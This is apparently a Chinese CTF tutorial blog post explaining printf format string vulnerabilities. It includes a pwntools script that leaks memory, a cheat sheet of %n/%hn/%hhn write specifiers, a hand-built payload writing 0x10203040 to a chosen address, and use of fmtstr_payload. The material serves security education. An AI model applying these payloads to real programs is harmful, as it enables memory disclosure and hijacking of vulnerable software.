printf格式化字符串漏洞原理解析

最新推荐文章于 2026-06-20 13:46:54 发布
原创 最新推荐文章于 2026-06-20 13:46:54 发布 · 6.4k 阅读 · 29 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#PWN #printf #漏洞 #CTF
本文深入解析printf格式化字符串漏洞,介绍了如何利用漏洞读取任意地址内容和写入任意地址。通过调整参数和利用pwntool,可以实现内存的读写操作,对CTF和安全研究具有重要意义。

读任意地址

printf("%x")只给格式化字符串,而不给参数,会导致内存泄漏从而读到内存中其他地址的数据。

%N$x参数可以以16进制方式打印第N个参数的内容,通过修改N,我们可以遍历栈上的所有内容。

通过%N$s参数,我们可以将第N个参数对应的内容作为字符串的地址从而获得内存中任意位置的内容。方法如下

  1. 如果我们使用的打印语句为:printf("AAAA%x")那么栈的内容如下:
栈底
x
%
A
A
A
A
栈顶
  1. 使用printf("AAAA%N$x"),并令N=1,2,3,… 假设,当N=6时得到如下输出内容:
    AAAA41414141#
    其中41是‘A’的ASCII码,‘41414141#’正好是4个字节,即int的大小,这说明偏移量为6时正好读到格式化字符串在栈中的位置。
  2. 使用printf("%7$sAAAA"),则栈内容如下:
栈底
A
A
A
A
s
$
7
%
栈顶

我们知道偏移量为6时正好能读到‘%’的位置,那么偏移量为7的时候会往栈底方向再走4个字节,于是得到的内容为‘AAAA’,而由于这次我们使用的是%s打印符,因此会打印地址‘AAAA’处的内容,通过修改‘AAAA’的内容,就可以打印任意内存位置的内容。
4. 可以用pwntool实现该功能如下:

from pwn import *
 
context.log_level='debug'
conn=process('./test')
 conn.sendline("%7$s"+p32(0x08048000))#获取地址0x08048000处的
print conn.recv()

写任意地址

写地址要用到%n格式化符,例如printf("AAAA%n",&a),会将‘AAAA’的长度值4写入变量a。如果采用printf("AAAA%N$n")就可以向地址偏移N的位置的值解析为指针,并将指针指向的地址写入4。

例如:printf("AAAA%6$n"),由于前面的测试中我们发现偏移值是6,因此偏移6对应的栈位置为‘AAAA’,程序将‘AAAA’解析为地址,并向该地址写入"AAAA%6$n"的长度值8.

如果要像任意地址写入任意数值,我们不可能真的构造那么长的字符串,这时可以采用如下格式化符一次写入多个字节:

32位
 
读
 
'%{}$x'.format(index)           // 读4个字节
'%{}$p'.format(index)           // 同上面
'${}$s'.format(index)'%{}$n'.format(index)           // 解引用,写入四个字节
'%{}$hn'.format(index)          // 解引用,写入两个字节
'%{}$hhn'.format(index)         // 解引用,写入一个字节
'%{}$lln'.format(index)         // 解引用,写入八个字节
 
////////////////////////////
64位
 
读
 
'%{}$x'.format(index, num)      // 读4个字节
'%{}$lx'.format(index, num)     // 读8个字节
'%{}$p'.format(index)           // 读8个字节
'${}$s'.format(index)'%{}$n'.format(index)           // 解引用,写入四个字节
'%{}$hn'.format(index)          // 解引用,写入两个字节
'%{}$hhn'.format(index)         // 解引用,写入一个字节
'%{}$lln'.format(index)         // 解引用,写入八个字节
 
%1$lx: RSI
%2$lx: RDX
%3$lx: RCX
%4$lx: R8
%5$lx: R9
%6$lx: 栈上的第一个QWORD

举个例子,我们希望向0x08048000写入值0x10203040,可以这样构造:

\x00\x80\x04\x08\x01\x80\x04\x08\x02\x80\x04\x08\x03\x80\x04\x08%48c%6$hhn%240c%7$hhn%240c%8$hhn%240c%9$hhn

分解一下就是四个地址加上四个格式化字符

\x00\x80\x04\x08
\x01\x80\x04\x08
\x02\x80\x04\x08
\x03\x80\x04\x08
%48c%6$hhn
%240c%7$hhn
%240c%8$hhn
%240c%9$hhn

即对0x08048000写入16+48=64=0x40
对0x08048001写入0x40+240=304=0x130=0x30
对0x08048002写入0x30+240=288=0x120=0x20
对0x08048003写入0x20+240=272=0x110=0x10
但是这个payload以0x00开头,可以手工调整一下,调换地址与格式化字符的位置,还要改一下n的值.

当然,这样还是过于麻烦,实际上可以使用pwntool的fmtstr模块

fmtstr_payload(6, {0x08048000:0x10203040}) #6为格式化字符的偏移值
C——printf输出$
Williamcsj的博客
06-14 1172
原因:使用了double或者类型不一致 解决办法:将double换成float
Exploit-Exercise之Protostar-format
Yale的博客
07-20 515
0x00 Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。 本文将介绍format部分。 关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录 查看ip 知道ip后可以在kali中ssh连上 输入user即可 机器上所有需要分析的程序都在如下路径 0x01 第一关,fotmat0 我们的目标是控制target为0xde
printf()用法及介绍
CS5854526的博客
04-16 1223
转载于 http://baike.baidu.com/view/1427555.htm printf()函数是式样化输出函数, 一般用于向准则输出设备按规定式样输出消息。正在编写步骤时经常会用到此函数。printf()函数的挪用式样为: printf("",); 其中式样化字符串包括两部分内容: 一部分是正常字符, 这些字符将按原样输出;另一部分是式样化规定字符, 以"%"开端, 后
格式化字符串漏洞:任意写
深度技术安全
02-05 629
linux pwn: 格式化字符串漏洞任意写
printf中%x及其相关的用法
qq_41470744的博客
07-09 5366
第一种定义List方法: void main(List<String> args) { List mylist = ['香蕉','苹果','橘子']; print(mylist[1]); } List里面的属性:
利用格式化字符串漏洞实现任意地址读写
个人笔记
06-01 6237
理解格式化字符串漏洞关键还是在于理解栈空间布局,任意地址写初学者接触到可能较为抽象,但是结合栈空间布局以及格式化字符串原理,详细我们就能对格式化字符串有个更加清晰的认知。如果能够复现上述漏洞案例,那么恭喜你,已经完成了 pwn 格式化字符串漏洞这一旅程。
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至
07-23 3646
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
格式化字符串漏洞
Starr
03-22 2220
文章目录1. 再看printfprintf家族函数转换规则2. 漏洞原理危害防范3. 任意地址内存泄漏 Demo4. 覆盖栈数据5. 任意地址覆盖6. Pwntool Demo7. 工具8. 参考文章 格式化字符串漏洞基本已经销声匿迹了,不过在iot设备上可能还会存在。 1. 再看printf printf家族函数 #include <stdio.h> int printf(); int fprintf(); int dprintf(); int sprintf(); int snprintf(
格式化字符串漏洞:从原理到实战利用与防护
最新发布
weixin_33783283的博客
06-20 340
格式化字符串是C语言中用于控制输入输出格式的核心机制,常见于printf、sprintf等函数。其工作原理是函数根据格式说明符(如%s、%d)从参数栈中按序读取数据。当程序员错误地将用户可控数据直接作为格式化字符串参数时,便会产生格式化字符串漏洞,这赋予了攻击者强大的内存操作能力。该漏洞的技术价值在于其能实现任意内存读、写两大核心原语,进而可能导致敏感信息泄露或程序控制流劫持,在CTF竞赛、二进制安全审计及遗留系统渗透测试等场景中备受关注。本文以printf(user_input)这一典型漏洞代码为切入点,
cell-click 传参数_C语言可变参数及其原理
weixin_39980353的博客
10-25 472
在刚学C没多久的时候,我一直有这么个疑问:printf这个函数是怎么做到可以处理不同数量的参数的?在初学C的时候,根本就没有遇到过(事实上程序设计课也没讲过)。我们追踪一下printf的实现:这里用到了__builtin_va_list,__builtin_va_start,__builtin_va_end,在中间调用了__mingw_vprintf函数,把类型为__builtin_va_list...
C语言格式化I/O深度解析:从printf/scanf原理到安全编程实践
weixin_33391446的博客
06-14 283
格式化输入输出是程序与外部世界进行数据交换的核心机制,其本质是将内存中的二进制数据按照特定规则转换为人类可读的文本格式,或将文本数据解析为程序可处理的二进制表示。这一过程涉及类型转换、缓冲区管理和格式解析等多个技术环节,在C语言中主要通过printf和scanf函数族实现。理解格式化I/O的工作原理对于开发健壮的应用程序至关重要,特别是在处理日志输出、数据文件解析和用户交互等场景时。本文聚焦于C语言标准I/O库的格式化功能,深入探讨printf和scanf的完整语法规范,包括标志位、宽度精度控制、长度修饰符
攻防世界-wp-PWN-新手区-7-CGfsb
Scorpio_m7
03-07 1606
题目来源: CGCTF 题目描述: 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 题目场景: 111.200.241.244:40185 题目附件: e41a0f684d0e497f87bb309f91737e4d 题目思路: 格式化字符串漏洞视频讲解,printf格式化字符串漏洞原理与利用 构造payload,在格式化字符串中包含想要写入的地址,此时该地址会随格式化字符串放在栈上,然后用格式化字符串的%K$n来实现改写功能。 解题过程: 拿到程序后,我们首先checksec一下,发现
shellcode之四:格式化漏洞
kingvon_liwei的专栏
09-11 528
声明:主要内容来自《The Shellcoder's Handbook》,摘录重点作为笔记并加上个人的一些理解,如有错,请务必指出。 格式化漏洞   当printf系列函数的格式化串里包含用户提交的数据时,有可能出现格式化漏洞。攻击者可能提交许多格式化字符(但不提供对应的变量),这样栈上就没有和格式符相对于的参数,因此系统就会用栈上的其他数据代替这项参数,从而导致信息泄露和执行指
漏洞分析实践_格式化字符串漏洞
kitsch0x97的博客
12-17 1272
格式化字符串是由普通字符串格式化规定字符构成的字符序列。普通字符会原封不动地复制到输出流中,而格式化规定字符以。
格式化字符串漏洞入门:从零开始学习CTFshow PWN题(含libc泄露与got表覆盖技巧)
weixin_29322553的博客
03-17 310
本文深入解析格式化字符串漏洞原理与利用技巧,从基础的内存读写到高级的libc泄露与GOT表覆盖技术,结合CTFshow PWN题实战案例,帮助读者掌握二进制安全的核心攻击方法。特别介绍了如何通过格式化字符串漏洞实现权限提升和系统控制。
格式化字符串的简单学习
akdelt的博客
02-13 2025
通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。这样就能泄露栈上第 25 个字节处的值 也就是这道题的 canary。这个地方有异或操作,而且之后就跳转回 main 函数,所以 [rbp-0x8] 应该就是栈中存放 canary 的地址。对于 2,3 来说倒还无妨,但是对于对于 1 来说,如果提供了一个不可访问地址,比如 0,那么程序就会因此而崩溃。在进入 printf 函数的之前 (即还没有调用 printf),栈上的布局由高地址到低地址依次如下。
【sprintf】sprintf功能介绍
sdgsdgg的博客
06-24 2244
一.安装和删除Docker //通过yum源安装: 由于官网的yum源太慢,下面使用阿里云的Yum源进行安装
C语言可变参数及其原理
ValK_leviathan的博客
10-22 1353
在刚学C没多久的时候,我一直有这么个疑问: printf这个函数是怎么做到可以处理不同数量的参数的?在初学C的时候,根本就没有遇到过(事实上程序设计课也没讲过)。 我们追踪一下printf的实现: 这里用到了__builtin_va_list,__builtin_va_start,__builtin_va_end,在中间调用了__mingw_vprintf函数,把类型为__builtin_va_list的__local_argv和第一个参数__format传了进去……然后就不明所以了。 所幸我找到了一份
格式化字符串漏洞原理及简单利用(CGfsb题解)
Sea_Sand息禅
04-02 5566
先介绍一下格式化字符串漏洞,这种漏洞在实际中应该很少有了,但仍然需要了解这些基础的漏洞知识。 会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数,该题就是利用了printf漏洞,下面以printf为例进行介绍。 printf函数的使用方法为:printf("format",输出表列),由于format部分可以有许多的占位符及字母,所以接受的参...
Pwn格式化字符串漏洞
Rinko233的博客
11-07 2172
格式化字符串漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值